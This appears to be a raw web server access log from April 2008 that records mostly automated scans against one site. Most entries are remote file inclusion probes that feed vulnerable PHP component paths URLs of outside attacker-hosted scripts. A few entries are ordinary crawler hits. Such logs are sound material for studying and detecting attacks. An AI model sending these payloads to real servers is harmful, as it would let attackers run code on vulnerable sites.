72.29.81.87 - - [10/Apr/2008:09:00:00 -0700] "GET /logs/access_080308.log/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.youwilllistentowhatwesay.com/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.81.87 - - [10/Apr/2008:09:00:00 -0700] "GET /xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.youwilllistentowhatwesay.com/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.81.87 - - [10/Apr/2008:09:00:00 -0700] "GET /logs/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.youwilllistentowhatwesay.com/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.128.80.101 - - [10/Apr/2008:09:00:12 -0700] "GET /logs/access.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.148.95.154 - - [10/Apr/2008:09:00:13 -0700] "GET /default.php?page=http://xdengue01.iespana.es/bds/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
74.50.100.222 - - [10/Apr/2008:09:00:21 -0700] "GET /logs/access_080226.log//components/com_simpleboard/image_upload.php?sbp=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.100.222 - - [10/Apr/2008:09:00:21 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.100.222 - - [10/Apr/2008:09:00:22 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.26.84 - - [10/Apr/2008:09:00:27 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.68.203.22 - - [10/Apr/2008:09:00:37 -0700] "GET /logs/access_080129.log//administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.68.203.22 - - [10/Apr/2008:09:00:37 -0700] "GET //administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.68.203.22 - - [10/Apr/2008:09:00:38 -0700] "GET /logs//administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.68.203.22 - - [10/Apr/2008:09:00:38 -0700] "GET /logs/access_080129.log//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.68.203.22 - - [10/Apr/2008:09:00:38 -0700] "GET //administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.68.203.22 - - [10/Apr/2008:09:00:39 -0700] "GET /logs//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
220.130.213.205 - - [10/Apr/2008:09:00:47 -0700] "GET /logs/access_080223.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
220.130.213.205 - - [10/Apr/2008:09:00:47 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
220.130.213.205 - - [10/Apr/2008:09:00:48 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
205.234.242.100 - - [10/Apr/2008:09:01:02 -0700] "GET /logs//phplinks/includes/smarty.php?full_path_to_public_program=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
205.234.242.100 - - [10/Apr/2008:09:01:02 -0700] "GET //phplinks/includes/smarty.php?full_path_to_public_program=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
80.68.203.22 - - [10/Apr/2008:09:01:17 -0700] "GET /logs/access_080218.log//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.68.203.22 - - [10/Apr/2008:09:01:18 -0700] "GET /logs/access_080306.log//administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.68.203.22 - - [10/Apr/2008:09:01:20 -0700] "GET /logs/access_080306.log//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.68.203.22 - - [10/Apr/2008:09:01:25 -0700] "GET /logs/access_080129.log//administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.68.203.22 - - [10/Apr/2008:09:01:25 -0700] "GET //administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.68.203.22 - - [10/Apr/2008:09:01:26 -0700] "GET /logs//administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.68.203.22 - - [10/Apr/2008:09:01:32 -0700] "GET /logs/access_080129.log//administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.68.203.22 - - [10/Apr/2008:09:01:32 -0700] "GET //administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.68.203.22 - - [10/Apr/2008:09:01:33 -0700] "GET /logs//administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.19.107.122 - - [10/Apr/2008:09:01:40 -0700] "GET /logs/access_080117.log/claroline/inc/claro_init_header.inc.php?includePath=http://h1.ripway.com/incus/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.68.203.22 - - [10/Apr/2008:09:01:45 -0700] "GET /logs/access_080129.log//administrator/components/com_jcs/views/list.sub.html.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.68.203.22 - - [10/Apr/2008:09:01:45 -0700] "GET //administrator/components/com_jcs/views/list.sub.html.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.68.203.22 - - [10/Apr/2008:09:01:46 -0700] "GET /logs//administrator/components/com_jcs/views/list.sub.html.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.68.203.22 - - [10/Apr/2008:09:02:02 -0700] "GET /logs/access_080129.log//administrator/components/com_jcs/views/list.sub.html.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.68.203.22 - - [10/Apr/2008:09:02:03 -0700] "GET //administrator/components/com_jcs/views/list.sub.html.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.68.203.22 - - [10/Apr/2008:09:02:03 -0700] "GET /logs//administrator/components/com_jcs/views/list.sub.html.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.68.203.22 - - [10/Apr/2008:09:02:05 -0700] "GET /logs/access_080306.log//administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.68.203.22 - - [10/Apr/2008:09:02:11 -0700] "GET /logs/access_080129.log//administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.68.203.22 - - [10/Apr/2008:09:02:11 -0700] "GET //administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.68.203.22 - - [10/Apr/2008:09:02:12 -0700] "GET /logs//administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.68.203.22 - - [10/Apr/2008:09:02:12 -0700] "GET /logs/access_080129.log//administrator/components/com_jcs/view/add.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.154.38.121 - - [10/Apr/2008:09:02:13 -0700] "GET /logs/access_080213.log/include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.154.38.121 - - [10/Apr/2008:09:02:13 -0700] "GET /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.154.38.121 - - [10/Apr/2008:09:02:13 -0700] "GET /logs/include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.93.107.242 - - [10/Apr/2008:09:02:14 -0700] "GET /logs/access_080117.log/claroline/inc/claro_init_header.inc.php?includePath=http://www.boewe-security.de/galerie//update/data.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
80.68.203.22 - - [10/Apr/2008:09:02:15 -0700] "GET /logs/access_080306.log//administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.58.254.89 - - [10/Apr/2008:09:02:15 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
80.68.203.22 - - [10/Apr/2008:09:02:15 -0700] "GET //administrator/components/com_jcs/view/add.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.58.254.89 - - [10/Apr/2008:09:02:17 -0700] "GET //index.php?option=com_custompages&cpage=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 200 7371 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
74.50.100.222 - - [10/Apr/2008:09:02:18 -0700] "GET /logs/access_080207.log//components/com_simpleboard/image_upload.php?sbp=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.154.38.121 - - [10/Apr/2008:09:02:20 -0700] "GET /logs/access_080312.log/include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.68.203.22 - - [10/Apr/2008:09:02:21 -0700] "GET /logs/access_080306.log//administrator/components/com_jcs/views/list.sub.html.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.68.203.22 - - [10/Apr/2008:09:02:21 -0700] "GET /logs//administrator/components/com_jcs/view/add.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.68.203.22 - - [10/Apr/2008:09:02:24 -0700] "GET /logs/access_080129.log//administrator/components/com_jcs/view/add.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.68.203.22 - - [10/Apr/2008:09:02:24 -0700] "GET //administrator/components/com_jcs/view/add.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.68.203.22 - - [10/Apr/2008:09:02:24 -0700] "GET /logs//administrator/components/com_jcs/view/add.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
147.156.161.91 - - [10/Apr/2008:09:02:30 -0700] "GET /logs/access_080401.log/include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
147.156.161.91 - - [10/Apr/2008:09:02:31 -0700] "GET /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
147.156.161.91 - - [10/Apr/2008:09:02:31 -0700] "GET /logs/include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.68.203.22 - - [10/Apr/2008:09:02:37 -0700] "GET /logs/access_080129.log//administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.68.203.22 - - [10/Apr/2008:09:02:38 -0700] "GET //administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.68.203.22 - - [10/Apr/2008:09:02:38 -0700] "GET /logs//administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.243.253.159 - - [10/Apr/2008:09:02:41 -0700] "GET /logs/access_080127.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.243.253.159 - - [10/Apr/2008:09:02:41 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.68.203.22 - - [10/Apr/2008:09:02:43 -0700] "GET /logs/access_080129.log//administrator/components/com_jcs/views/list.user.sub.html.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.68.203.22 - - [10/Apr/2008:09:02:43 -0700] "GET //administrator/components/com_jcs/views/list.user.sub.html.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.68.203.22 - - [10/Apr/2008:09:02:44 -0700] "GET /logs//administrator/components/com_jcs/views/list.user.sub.html.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.68.203.22 - - [10/Apr/2008:09:02:49 -0700] "GET /logs/access_080306.log//administrator/components/com_jcs/views/list.sub.html.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.68.203.22 - - [10/Apr/2008:09:02:54 -0700] "GET /logs/access_080306.log//administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.68.203.22 - - [10/Apr/2008:09:02:57 -0700] "GET /logs/access_080129.log//administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.68.203.22 - - [10/Apr/2008:09:02:57 -0700] "GET //administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.68.203.22 - - [10/Apr/2008:09:02:59 -0700] "GET /logs//administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.68.203.22 - - [10/Apr/2008:09:03:01 -0700] "GET /logs/access_080306.log//administrator/components/com_jcs/view/add.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.68.203.22 - - [10/Apr/2008:09:03:11 -0700] "GET /logs/access_080306.log//administrator/components/com_jcs/view/add.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
147.156.161.91 - - [10/Apr/2008:09:03:15 -0700] "GET /logs/access_080223.log/include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.112.193.46 - - [10/Apr/2008:09:03:17 -0700] "GET /logs/access_080117.log//components/com_simpleboard/image_upload.php?sbp=http://www.eckosystem.eti.br/redeye/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.141.54.186 - - [10/Apr/2008:09:03:21 -0700] "GET /logs/access_080123.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.thiaguinho.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.54.186 - - [10/Apr/2008:09:03:21 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.thiaguinho.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.68.203.22 - - [10/Apr/2008:09:03:26 -0700] "GET /logs/access_080129.log//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.68.203.22 - - [10/Apr/2008:09:03:27 -0700] "GET //administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.68.203.22 - - [10/Apr/2008:09:03:27 -0700] "GET /logs//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.68.203.22 - - [10/Apr/2008:09:03:30 -0700] "GET /logs/access_080129.log//administrator/components/com_jcs/views/list.user.sub.html.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.68.203.22 - - [10/Apr/2008:09:03:30 -0700] "GET //administrator/components/com_jcs/views/list.user.sub.html.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.68.203.22 - - [10/Apr/2008:09:03:31 -0700] "GET /logs//administrator/components/com_jcs/views/list.user.sub.html.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.148.95.154 - - [10/Apr/2008:09:03:34 -0700] "GET /logs/access_080218.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.148.95.154 - - [10/Apr/2008:09:03:34 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.148.95.154 - - [10/Apr/2008:09:03:35 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
80.68.203.22 - - [10/Apr/2008:09:03:38 -0700] "GET /logs/access_080306.log//administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.68.203.22 - - [10/Apr/2008:09:03:38 -0700] "GET /logs/access_080306.log//administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.68.203.22 - - [10/Apr/2008:09:03:39 -0700] "GET /logs/access_080306.log//administrator/components/com_jcs/views/list.user.sub.html.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.27.58 - - [10/Apr/2008:09:03:45 -0700] "GET /presto/?D=D HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.50.100.222 - - [10/Apr/2008:09:03:50 -0700] "GET /logs/access_080223.log/include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.100.222 - - [10/Apr/2008:09:03:51 -0700] "GET /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.100.222 - - [10/Apr/2008:09:03:51 -0700] "GET /logs/include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.243.253.159 - - [10/Apr/2008:09:04:02 -0700] "GET /logs/access_080118.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.68.203.22 - - [10/Apr/2008:09:04:15 -0700] "GET /logs/access_080306.log//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.68.203.22 - - [10/Apr/2008:09:04:18 -0700] "GET /logs/access_080306.log//administrator/components/com_jcs/views/list.user.sub.html.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
219.232.41.148 - - [10/Apr/2008:09:04:25 -0700] "GET /logs/access.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.232.41.148 - - [10/Apr/2008:09:04:26 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.232.41.148 - - [10/Apr/2008:09:04:32 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.81.87 - - [10/Apr/2008:09:04:50 -0700] "GET /logs/access_080207.log//skin/zero_vote/ask_password.php?dir=http://www.youwilllistentowhatwesay.com/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.81.87 - - [10/Apr/2008:09:04:50 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.youwilllistentowhatwesay.com/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.81.87 - - [10/Apr/2008:09:04:51 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.youwilllistentowhatwesay.com/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.67.26.84 - - [10/Apr/2008:09:05:05 -0700] "GET /logs/access_080127.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.67.26.84 - - [10/Apr/2008:09:05:06 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.67.26.84 - - [10/Apr/2008:09:05:06 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.7.187 - - [10/Apr/2008:09:05:15 -0700] "GET /megumi/Bracelet/?D=A HTTP/1.0" 200 1689 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
193.164.131.35 - - [10/Apr/2008:09:05:30 -0700] "GET //index.php?option=com_poll&task=results&id=14&mosConfig_absolute_path=http://www.folgoreclan.com/ex/controllo.txt? HTTP/1.1" 200 7371 "-" "libwww-perl/5.803" "www.dmulk.com"
193.164.131.35 - - [10/Apr/2008:09:05:33 -0700] "GET /logs//index.php?option=com_poll&task=results&id=14&mosConfig_absolute_path=http://www.folgoreclan.com/ex/controllo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.141.54.186 - - [10/Apr/2008:09:05:36 -0700] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.thiaguinho.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
219.232.41.148 - - [10/Apr/2008:09:05:37 -0700] "GET /logs/access.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.232.41.148 - - [10/Apr/2008:09:05:37 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
